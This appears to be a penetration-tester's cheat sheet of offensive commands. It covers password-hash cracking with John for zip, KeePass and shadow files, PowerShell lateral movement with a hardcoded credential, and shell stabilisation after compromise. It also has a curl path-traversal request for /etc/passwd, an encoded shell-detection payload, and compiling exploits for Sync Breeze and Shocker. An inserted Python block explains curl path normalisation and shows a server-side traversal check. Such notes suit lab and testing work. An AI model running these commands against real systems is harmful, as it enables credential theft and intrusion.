UTILS

Unzip encrypted zips

zip2john file > zip.file
john zip.file --wordlist=/wordlistPath

Create user list with names

username-anarchy --input-file names.txt --select-format first,flast,first.last,firstl > usernames.txt

KeePass master password hash extraction (for john)

keepass2john data.kdbx > hash.txt

DECODE BASE64

echo -n "cadena" | base64 -d; echo  

CRACK SHADOW TXT

We need both the passwd and the shadow file:

unshadow passwd.txt shadow.txt > unshadowed.txt

Lateral Movement (PowerShell Invoke-Command)

$user = "machineName\user"
$password = ConvertTo-SecureString "butterfly!#1" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential($user, $password)

Invoke-Command -Credential $cred -ComputerName SNIPER -ScriptBlock { whoami }

TTY Treatment

To get a fully interactive terminal, follow these steps:

  1. Once we have gained access to the system, run the following command:

script /dev/null -c bash

  2. Press CTRL + Z

  3. Enter the following command:

stty raw -echo; fg

  4. Reset the xterm:

reset xterm

  5. Export the TERM and SHELL variables:

export TERM=xterm
export SHELL=bash

  6. Adjust the window size. For this we need to know the size of our own terminal, obtained locally with the first command, and then apply it with the second:

stty size
stty rows x columns y

CURL

Verbose output

curl -v http://<DOMAIN>

POST Method

curl -X POST http://<DOMAIN>

PUT Method

curl -X PUT http://<DOMAIN>

Use --path-as-is to send /../ or /./ in the URL path literally, instead of letting curl normalise them away before the request is sent

curl --path-as-is http://<DOMAIN>/../../../../../../etc/passwd
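As an added illustration (not part of the original notes): the first function shows the dot-segment normalisation curl applies by default, which --path-as-is switches off; the second is the server-side check that makes the literally transmitted traversal harmless. The document root is an assumed value.

```python
import posixpath
from urllib.parse import unquote

# Assumed document root for the example (constructed, not from the page).
WEB_ROOT = "/var/www/html"


def remove_dot_segments(path: str) -> str:
    """Collapse '/./' and '/../' the way a URL client normally does
    (RFC 3986 section 5.2.4). curl applies this unless --path-as-is is
    given, so without the flag '/../../etc/passwd' leaves the client as
    '/etc/passwd'. Assumes an absolute path starting with '/'."""
    segs = path.split("/")
    out = []
    for i, seg in enumerate(segs):
        last = i == len(segs) - 1
        if seg == "..":
            if len(out) > 1:      # never pop the leading "" (the root)
                out.pop()
            if last:
                out.append("")    # keep a trailing slash, as the RFC does
        elif seg == ".":
            if last:
                out.append("")
        else:
            out.append(seg)
    return "/".join(out) or "/"


def resolve_under_root(request_path: str, root: str = WEB_ROOT):
    """Server-side mitigation: map a request path to a file under root,
    or return None. Percent-decoding happens once, before resolution, so
    '%2e%2e%2f' is treated like '../'; the check then relies on the
    resolved filesystem path, not on anything the client normalised."""
    decoded = unquote(request_path)
    if "\x00" in decoded:
        return None                      # NUL can truncate native paths
    candidate = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    if candidate != root and not candidate.startswith(root + "/"):
        return None                      # escaped the document root
    return candidate


if __name__ == "__main__":
    raw = "/../../../../../../etc/passwd"
    print("client sends without --path-as-is:", remove_dot_segments(raw))
    print("server resolution of the raw path:", resolve_under_root(raw))
    print("server resolution of /images/../index.html:",
          resolve_under_root("/images/../index.html"))
```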

File Upload

curl -F myFile=@<FILE> http://<RHOST>

Detect if CMD or Powershell is used

We can use a handy snippet, published by PetSerAl, that displays "CMD" or "PowerShell" depending on which interpreter executes it.

(dir 2>&1 *`|echo CMD);&<# rem #>echo PowerShell

The same snippet, URL-encoded:

(dir%202%3E%261%20*%60%7Cecho%20CMD)%3B%26%3C%23%20rem%20%23%3Eecho%20PowerShell

Compile an exploit (cross-compile for Windows with mingw, or natively for Linux)

i686-w64-mingw32-gcc 42341.c -o syncbreeze_exploit.exe
gcc shocker.c -o shocker

Run binaries in Linux

sudo wine exploit.exe
